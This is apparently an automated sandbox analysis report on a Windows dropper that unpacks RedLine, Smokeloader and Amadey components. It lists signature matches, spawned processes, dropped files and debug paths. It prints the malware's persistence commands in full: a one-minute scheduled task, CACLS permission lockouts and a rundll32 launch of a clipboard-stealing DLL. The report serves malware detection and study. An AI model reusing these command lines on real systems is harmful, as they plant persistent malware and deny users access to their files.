                            Source: 00000002.00000002.338085123.0000000000676000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                            Source: 00000002.00000003.311645008.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00071F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exeCode function: 1_2_01081F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: String function: 0040E1D8 appears 44 times
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: String function: 0058E43F appears 44 times
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: String function: 008D5E20 appears 130 times
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: String function: 008D7CE0 appears 40 times
                            Source: file.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 381118 bytes, 2 files, at 0x2c +A "bKug.exe" +A "xriv.exe", ID 1586, number 1, 18 datablocks, 0x1503 compression
                            Source: bKug.exe.0.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 189668 bytes, 2 files, at 0x2c +A "aKuf.exe" +A "nika.exe", ID 1546, number 1, 9 datablocks, 0x1503 compression
                            Source: file.exe, 00000000.00000003.299202495.0000000004AE7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                            Source: file.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                            Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aKuf.exe.logJump to behavior
                            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@37/14@0/1
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0007597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeCode function: 4_2_00007FF9A5D41B10 ChangeServiceConfigA,
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00074FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,
                            Source: file.exeReversingLabs: Detection: 64%
                            Source: file.exeVirustotal: Detection: 52%
                            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe
                            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
                            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /E
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /E
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /E
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /E
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00071F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exeCode function: 1_2_01081F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMPJump to behavior
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0007597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
                            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4968:120:WilError_01
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2332:120:WilError_01
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeMutant created: \Sessions\1\BaseNamedObjects\c1ec479e5342a25940592acf24703eb2
                            Source: C:\Users\user\Desktop\file.exeCommand line argument: Kernel32.dll
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exeCommand line argument: Kernel32.dll
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCommand line argument: 08A
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                            Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: Binary string: wextract.pdb source: file.exe, bKug.exe.0.dr
                            Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: file.exe, 00000000.00000003.299202495.0000000004AE7000.00000004.00000020.00020000.00000000.sdmp, xriv.exe, 00000006.00000000.363577848.00000000008EE000.00000002.00000001.01000000.00000009.sdmp, xriv.exe, 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmp, mnolyk.exe, 00000007.00000002.822994493.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000007.00000000.365129064.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000012.00000002.375077518.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000012.00000000.370020877.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000019.00000002.494152388.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000019.00000000.493611540.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001B.00000000.619977727.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001B.00000002.620319914.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001D.00000000.748590651.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001D.00000002.755553344.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe.6.dr, xriv.exe.0.dr
                            Source: Binary string: Healer.pdb source: aKuf.exe, 00000002.00000002.338408809.0000000002390000.00000004.08000000.00040000.00000000.sdmp, aKuf.exe, 00000002.00000002.338220630.00000000008C0000.00000004.08000000.00040000.00000000.sdmp, aKuf.exe, 00000002.00000002.338462611.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, aKuf.exe, 00000002.00000002.338356597.0000000002280000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: wextract.pdbGCTL source: file.exe, bKug.exe.0.dr
                            Source: Binary string: =cC:\mologoz-wavilowive.pdb source: bKug.exe, 00000001.00000003.299884970.0000000004A4A000.00000004.00000020.00020000.00000000.sdmp, aKuf.exe, 00000002.00000000.300060819.0000000000401000.00000020.00000001.01000000.00000005.sdmp, aKuf.exe.1.dr
                            Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: bKug.exe, 00000001.00000003.299884970.0000000004A87000.00000004.00000020.00020000.00000000.sdmp, nika.exe, 00000004.00000000.339039470.00000000004E2000.00000002.00000001.01000000.00000008.sdmp, nika.exe.1.dr
                            Source: Binary string: _.pdb source: aKuf.exe, 00000002.00000002.338220630.00000000008C0000.00000004.08000000.00040000.00000000.sdmp, aKuf.exe, 00000002.00000002.338462611.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, aKuf.exe, 00000002.00000002.338356597.0000000002280000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: D:\Mktmp\Amadey\ClipperDLL\Release\CLIPPERDLL.pdb source: mnolyk.exe, 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.823015828.000000006E7CF000.00000002.00000001.01000000.0000000C.sdmp, clip64.dll.7.dr, clip64[1].dll.7.dr
                            Source: Binary string: Healer.pdbH5 source: aKuf.exe, 00000002.00000002.338408809.0000000002390000.00000004.08000000.00040000.00000000.sdmp, aKuf.exe, 00000002.00000002.338220630.00000000008C0000.00000004.08000000.00040000.00000000.sdmp, aKuf.exe, 00000002.00000002.338462611.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, aKuf.exe, 00000002.00000002.338356597.0000000002280000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\mologoz-wavilowive.pdb source: bKug.exe, 00000001.00000003.299884970.0000000004A4A000.00000004.00000020.00020000.00000000.sdmp, aKuf.exe, 00000002.00000000.300060819.0000000000401000.00000020.00000001.01000000.00000005.sdmp, aKuf.exe.1.dr

                            Data Obfuscation

                            barindex
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeUnpacked PE file: 2.2.aKuf.exe.400000.0.unpack
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeUnpacked PE file: 2.2.aKuf.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0007724D push ecx; ret
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exeCode function: 1_2_0108724D push ecx; ret
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_0041C40C push cs; iretd
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_00423149 push eax; ret
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_0041C50E push cs; iretd
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_004231C8 push eax; ret
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_0040E21D push ecx; ret
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_0041C6BE push ebx; ret
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_0059C125 push ebx; ret
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_0058E484 push ecx; ret
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_0059BE73 push cs; iretd
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_0059BF75 push cs; iretd
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_02134139 push edi; iretd
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_0213454E push ecx; retf
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 6_2_008CF748 push E8FFFFFBh; iretd
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 6_2_008D7D26 push ecx; ret
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00072F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,
                            Source: nika.exe.1.drStatic PE information: 0xE382D401 [Fri Dec 15 06:19:45 2090 UTC]

                            Persistence and Installation Behavior

                            barindex
                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Source: Yara matchFile source: 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.823055961.0000000000DBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: mnolyk.exe PID: 2328, type: MEMORYSTR
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeFile created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeFile created: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeJump to dropped file
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeJump to dropped file
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00071AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exeCode function: 1_2_01081AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,

                            Boot Survival

                            barindex
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOX
